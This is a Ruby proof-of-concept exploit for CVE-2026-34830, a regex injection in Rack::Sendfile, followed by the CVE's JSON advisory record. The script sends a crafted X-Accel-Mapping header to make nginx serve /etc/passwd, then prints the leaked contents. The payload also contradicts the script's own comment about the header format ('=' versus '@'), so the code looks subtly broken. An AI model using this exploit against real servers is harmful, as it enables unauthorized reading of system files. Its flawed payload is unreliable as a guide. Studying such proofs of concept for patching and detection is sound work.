CVE-2026-34830

# Ruby PoC Concept for CVE-2026-34830 # This script sends a crafted X-Accel-Mapping header to exploit the regex injection. require 'net/http' # Vulnerable endpoint example uri = URI('http://localhost:3000/public/uploads/sensitive_file.txt') # Create the request request = Net::HTTP::Get.new(uri) # Inject regex metacharacters into the X-Accel-Mapping header. # The format expected by Rack is usually "/path/on/disk=/path/in/url". # By injecting regex, we can trick the mapping logic. # Example: Mapping a broad range of paths to a sensitive internal location. # Note: The exact payload depends on the Nginx configuration. request['X-Accel-Mapping'] = '^/var/www/uploads/.*@/etc/passwd' # Send the request response = Net::HTTP.start(uri.hostname, uri.port) do |http| http.request(request) end # Check if the server responded with the file content via X-Accel-Redirect if response.code == '200' && response.body.include?('root:') puts '[+] Exploit successful! Sensitive file content leaked.' puts response.body else puts '[-] Exploit failed or target not vulnerable.' end

{"cve": {"id": "CVE-2026-34830", "sourceIdentifier": "[email protected]", "published": "2026-04-02T17:16:26.267", "lastModified": "2026-04-16T16:50:50.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rack is a modular Ruby web server interface. Prior to versions 2.2.23, 3.1.21, and 3.2.6, Rack::Sendfile#map_accel_path interpolates the value of the X-Accel-Mapping request header directly into a regular expression when rewriting file paths for X-Accel-Redirect. Because the header value is not escaped, an attacker who can supply X-Accel-Mapping to the backend can inject regex metacharacters and control the generated X-Accel-Redirect response header. In deployments using Rack::Sendfile with x-accel-redirect, this can allow an attacker to cause nginx to serve unintended files from configured internal locations. This issue has been patched in versions 2.2.23, 3.1.21, and 3.2.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-625"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rack:rack:*:*:*:*:*:ruby:*:*", "versionEndExcluding": "2.2.23", "matchCriteriaId": "AD5DE7DE-3A8B-4064-A7D5-1E117A101E81"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rack:rack:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.1.21", "matchCriteriaId": "6948AAA6-873D-46BA-AA22-4C81138128E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rack:rack:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "3.2.0", "versionEndExcluding": "3.2.6", "matchCriteriaId": "3FB592AD-E826-49BE-AC6D-E5F55FDCC96E"}]}]}], "references": [{"url": "https://github.com/rack/rack/security/advisories/GHSA-qv7j-4883-hwh7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}